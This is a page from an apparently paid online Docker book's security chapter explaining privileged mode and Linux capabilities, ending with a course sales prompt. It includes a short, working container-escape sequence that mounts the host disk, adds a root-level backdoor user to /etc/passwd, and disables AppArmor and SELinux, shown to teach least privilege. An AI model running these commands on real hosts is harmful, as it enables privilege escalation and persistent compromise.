Feedback

Chat Icon

Painless Docker - 2nd Edition

A Comprehensive Guide to Mastering Docker and its Ecosystem

Docker Security Best Practices
73%

Privileged Mode & Capabilities

When you run a container with the --privileged flag, Docker grants it all available Linux capabilities and removes the restrictions imposed by the device cgroup controller. This essentially allows the container to access all hardware devices on the host and reconfigure security settings like AppArmor or SELinux. In this state, the container is no longer effectively confined; it has nearly the same level of access to the host as a root process running directly on the host machine.

Here is an example that demonstrates how a privileged container can be used to compromise the host's root filesystem:

# Create a container running in privileged mode
docker run --privileged -it -d --name evil ubuntu

# Access the shell of the privileged container
docker exec -it evil bash

# Inside the container, identify and mount the host's root partition
# Note: /dev/sda1 is an example; the specific device name may vary by host
mount /dev/sda1 /mnt

# Now that the host's root filesystem is mounted at /mnt,
# an attacker can perform the following actions:

# 1. Modify the host's root filesystem (e.g., adding a malicious user)
echo 'malicious_user:x:0:0::/root:/bin/bash' >> /mnt/etc/passwd

# 2. Manipulate kernel modules
modprobe some_module

# 3. Disable or modify AppArmor profiles
aa-disable /etc/apparmor.d/usr.sbin.nginx

# 4. Disable SELinux enforcement for the entire host
setenforce 0

The privileged flag should be avoided unless absolutely necessary. Instead, use the --cap-drop and --cap-add flags to fine-tune the capabilities granted to a container:

docker run -d --name my-app \
    --cap-drop ALL \
    --cap-add NET_BIND_SERVICE \
    ubuntu

Traditionally, Linux security was "all or nothing." You were either a standard user with limited rights or the all-powerful root user.

Linux Capabilities break this "root" power into small, distinct units. Instead of giving a container full administrative access, you can grant it only the specific privileges it needs - such as the ability to bind to a low-numbered network port (CAP_NET_BIND_SERVICE) or manage system time (CAP_SYS_TIME) - without allowing it to access the host's raw disk or bypass file permissions.

It's the technical implementation of the Principle of Least Privilege

Painless Docker - 2nd Edition

A Comprehensive Guide to Mastering Docker and its Ecosystem

Enroll now to unlock all content and receive all future updates for free.

Unlock now  $31.99$25.59

Hurry! This limited time offer ends in:

To redeem this offer, copy the coupon code below and apply it at checkout:

Learn More
Previous Next